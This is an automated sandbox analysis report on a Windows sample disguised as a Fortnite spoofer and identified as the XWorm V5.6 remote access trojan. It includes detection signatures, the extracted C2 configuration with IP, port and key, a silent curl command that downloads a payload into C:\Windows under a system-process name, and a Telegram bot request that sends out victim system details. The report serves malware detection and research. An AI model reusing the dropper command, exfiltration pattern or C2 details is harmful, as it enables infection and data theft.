Windows Analysis Report
18sFhgSyVK.exe

Overview

General Information

Sample name:	18sFhgSyVK.exe renamed because original name is a hash value
Original sample name:	22bbc82f84857c93f15ceb787da8ab57bd25aed0b32ef16124644231b1d142fc.exe
Analysis ID:	1561587
MD5:	4e0d7812adef8e43e4eae77bf07dcc94
SHA1:	2499fdf4c66070ec1b4d7c4e499f6dbc56565767
SHA256:	22bbc82f84857c93f15ceb787da8ab57bd25aed0b32ef16124644231b1d142fc
Tags:	exeuser-Chainskilabs
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Changes security center settings (notifications, updates, antivirus, firewall)

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspect Svchost Activity

Sigma detected: System File Execution Location Anomaly

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to retrieve information about pressed keystrokes

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

Queries disk information (often used to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: Use Short Name Path in Command Line

Stores files to the Windows start menu directory

Uses curl to download other files

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Antivirus detection for URL or domain

Source: https://r2.hypixel.cfd/svchost.exe

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Windows\StartMenuExperienceHost.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "104.198.168.179"], "Port": 1337, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\svchost.exe	ReversingLabs: Detection: 87%
Source: C:\Windows\StartMenuExperienceHost.exe	ReversingLabs: Detection: 87%

Multi AV Scanner detection for submitted file

Source: 18sFhgSyVK.exe

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Windows\StartMenuExperienceHost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack	String decryptor: 127.0.0.1,104.198.168.179
Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack	String decryptor: 1337
Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack	String decryptor: <123456789>
Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack	String decryptor: <Xwormmm>
Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack	String decryptor: XWorm V5.6
Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack	String decryptor: USB.exe
Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack	String decryptor: %Temp%
Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack	String decryptor: svchost.exe

Source: unknown	HTTPS traffic detected: 172.66.0.158:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49704 version: TLS 1.2

Source: 18sFhgSyVK.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\zinc\Desktop\Fortnite-Perm-Spoofer-main\x64\Release\spoofer.pdb&& source: 18sFhgSyVK.exe
Source:	Binary string: C:\Users\zinc\Desktop\Fortnite-Perm-Spoofer-main\x64\Release\spoofer.pdb source: 18sFhgSyVK.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49711 -> 104.198.168.179:1337
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 104.198.168.179:1337 -> 192.168.2.7:49711
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49711 -> 104.198.168.179:1337
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 104.198.168.179:1337 -> 192.168.2.7:49711
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49711 -> 104.198.168.179:1337
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49704 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 127.0.0.1
Source: Malware configuration extractor	URLs: 104.198.168.179

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.7:49711 -> 104.198.168.179:1337

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A66ED47A5B18832423BF5%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209TXRTVEZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown

DNS query: name: ip-api.com

Uses curl to download other files

Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent	Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown	TCP traffic detected without corresponding DNS query: 104.198.168.179

Source: global traffic	HTTP traffic detected: GET /svchost.exe HTTP/1.1Host: r2.hypixel.cfdUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A66ED47A5B18832423BF5%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209TXRTVEZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: r2.hypixel.cfd
Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 23 Nov 2024 20:03:15 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: StartMenuExperienceHost.exe, 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe.4.dr, svchost.exe.12.dr	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 00000005.00000002.1365183174.00000135A5613000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: StartMenuExperienceHost.exe, 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe.4.dr, svchost.exe.12.dr	String found in binary or memory: https://api.telegram.org/bot
Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000005.00000002.1365379718.00000135A5670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364634617.00000135A5659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364372315.00000135A566E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000002.1365379718.00000135A5670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364372315.00000135A566E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000005.00000003.1364326636.00000135A5675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365401513.00000135A5677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000003.1364634617.00000135A5659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&
Source: svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000005.00000002.1365401513.00000135A5677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000005.00000003.1264082877.00000135A5636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: curl.exe, 00000004.00000003.1272893130.0000016CB93CA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1272971937.0000016CB93A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://r2.hypixel.cfd/svchost.exe
Source: curl.exe, 00000004.00000002.1273183923.0000016CB93CB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1272893130.0000016CB93CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://r2.hypixel.cfd/svchost.exe(
Source: curl.exe, 00000004.00000002.1273129101.0000016CB9390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://r2.hypixel.cfd/svchost.exe-oC:
Source: svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000003.1364653557.00000135A5647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1264082877.00000135A5636000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 172.66.0.158:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49704 version: TLS 1.2

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\18sFhgSyVK.exe

Code function: 0_2_00007FF77C91C0D0 system,GetConsoleWindow,GetWindowLongW,SetWindowLongW,SetLayeredWindowAttributes,GetConsoleWindow,ShowWindow,system,_beginthreadex,system,_Thrd_detach,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,CreateThread,CreateThread,Sleep,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,CreateThread,remove,Sleep,GetConsoleWindow,ShowWindow,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@